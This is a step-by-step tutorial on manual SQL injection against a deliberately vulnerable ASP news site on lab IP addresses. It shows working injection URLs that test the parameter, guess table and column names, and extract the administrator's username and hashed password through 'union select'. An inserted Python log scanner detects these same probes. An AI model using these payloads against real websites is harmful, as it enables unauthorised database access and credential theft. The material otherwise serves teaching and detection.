How to perform manual SQL injection

11-09-2023

SQL injection is one of the most common ways to * * * a database. Its core idea is that the * * * appends database query code to a URL that normally passes a value into a database query, and then works out the desired data from what the page returns. Below we use an SQL injection vulnerability to * * * a deliberately built * * * platform and obtain the webmaster's account and password. IP address of the target server: 192.168.80.129; IP address of the * * * host: 192.168.80.128.

(1) find the injection point

Open any page of the site and look closely at the URL.

The injection point must be a page that takes a parameter, such as http://192.168.80.129/shownews.asp?id=7. Here `shownews.asp?id=7` passes a value to the page: `id=7` is handed to shownews.asp for processing.

We can test this URL by appending `and 1=1` and then `and 1=2`:

http://192.168.80.129/shownews.asp?id=7 and 1=1, the page still displays normally.

http://192.168.80.129/shownews.asp?id=7 and 1=2, the page no longer displays normally.

This means shownews.asp takes our `and 1=1` as part of the command it runs against the database, so we can construct SQL statements that are passed through and executed and use them to obtain the information we need. This is what is called an injection vulnerability, and a page that passes parameters into a command in this way is called an injection point.

(2) Guess the name of the table

The main purpose of * * * a website is usually to obtain the webmaster's user name and password. These are stored in a table in the backend database, so first we have to guess the name of that table.

The most commonly used table names are admin and admin_user. We can test a table name by appending a statement like this to the URL of the injection point:

http://192.168.80.129/shownews.asp?id=7 and (select count(*) from admin) > 0

`select count(*) from admin` counts the records in the admin table. If the admin table exists, the statement returns a number; as long as that number compares greater than 0 the condition is true, and the page displays normally. If the admin table does not exist, `select count(*) from admin` returns nothing, the `> 0` comparison fails, and the page cannot be displayed normally.

If the page does not display normally, try another table name until it does:

http://192.168.80.129/shownews.asp?id=7 and (select count(*) from admin_user) > 0

http://192.168.80.129/shownews.asp?id=7 and (select count(*) from manage_user) > 0

On this website the table is named manage_user.

Common table names are: admin, sysadmin, manager, admin123, webadmin, member, manage_user.

Note: If you really cannot guess the table name, tools such as Ming Xiaozi can help.

(3) Guess the number of fields

The next step is to find out which fields of this table hold the user name and password. First we need to know how many fields the table has.

The `order by` statement is used here. `order by` sorts the result by a given field, and `order by 10` sorts by the 10th field of the query. If a 10th field exists, the page displays normally; if the page fails to display, the 10th field does not exist.

http://192.168.80.129/shownews.asp?id=7 order by 11

If the page still displays normally with `order by 11` but fails with the next number, we can conclude that the table has 11 fields.

(4) Guess the field name

The next step is to learn which fields hold the user name and password, using a `union select` joint query:

http://192.168.80.129/shownews.asp?id=7 union select 1,2,3,4,5,6,7,8,9,10,11 from manage_user

The numbers that appear on the page show which positions of the select list are echoed; those are the positions where the user name and password field names can be placed.

The field that stores the user name is usually called username, and the field that stores the password is usually called password. Replace the second and third positions with these two names:

http://192.168.80.129/shownews.asp?id=7 union select 1,username,password,4,5,6,7,8,9,10,11 from manage_user

At this point the user name and password are revealed on the page.
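As an added defender-side example, not part of the original article: a Python scan over constructed IIS/W3C-style log lines that flags the probe patterns used in steps (1) to (4) above (boolean `and 1=1`/`and 1=2` tests, `select count(*)` table-existence probes, `order by` column counting and `union select`). The log layout, client addresses and the two-pattern threshold are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Probe patterns matching the walkthrough's steps: boolean test, table probe,
# column counting with ORDER BY, and UNION SELECT data extraction.
PROBE_PATTERNS = {
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "table_probe": re.compile(r"select\s+count\(\*\)\s+from\s+\w+", re.I),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Constructed sample log (assumed fields: date time client-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
2023-11-09 10:01:02 192.168.80.128 GET /shownews.asp id=7 200
2023-11-09 10:01:10 192.168.80.128 GET /shownews.asp id=7%20and%201=1 200
2023-11-09 10:01:15 192.168.80.128 GET /shownews.asp id=7%20and%201=2 500
2023-11-09 10:02:30 192.168.80.128 GET /shownews.asp id=7%20and%20(select%20count(*)%20from%20manage_user)%3E0 200
2023-11-09 10:03:00 192.168.80.128 GET /shownews.asp id=7%20order%20by%2011 200
2023-11-09 10:04:12 192.168.80.128 GET /shownews.asp id=7%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20manage_user 200
2023-11-09 10:05:00 192.168.80.130 GET /shownews.asp id=8 200
"""

def classify_query(raw_query):
    """URL-decode a query string and return the names of the probe patterns it matches."""
    decoded = unquote_plus(raw_query)
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)]

def scan_log(text):
    """Return (client_ip, uri_stem, decoded_query, probe_names) for each suspicious line."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue  # malformed or truncated line; skip rather than guess
        client_ip, stem, query = parts[2], parts[4], parts[5]
        hits = classify_query(query)
        if hits:
            findings.append((client_ip, stem, unquote_plus(query), hits))
    return findings

def offenders(findings, threshold=2):
    """Client IPs showing at least `threshold` distinct probe types; a single hit may be benign."""
    per_ip = {}
    for ip, _stem, _query, hits in findings:
        per_ip.setdefault(ip, set()).update(hits)
    return sorted(ip for ip, kinds in per_ip.items() if len(kinds) >= threshold)

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print("likely probing clients:", offenders(scan_log(SAMPLE_LOG)))
```

The 1=1 / 1=2 pair in particular is a cheap signal: a 200 followed by a 500 for the same stem from the same client within seconds is exactly the boolean test from step (1).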

(5) Guess the background management entrance

Version 2.0 of this Southern Data template still ships with a link called Administrator Login. Most websites no longer do this, so the entrance generally has to be guessed from experience. The management portal is usually kept in a subdirectory of the site named admin. Enter the address http://192.168.80.129/admin and the management portal is displayed.

You can log in here with the administrator account and password obtained earlier, but the password 3acdbb255b45d296 is obviously an MD5 hash.
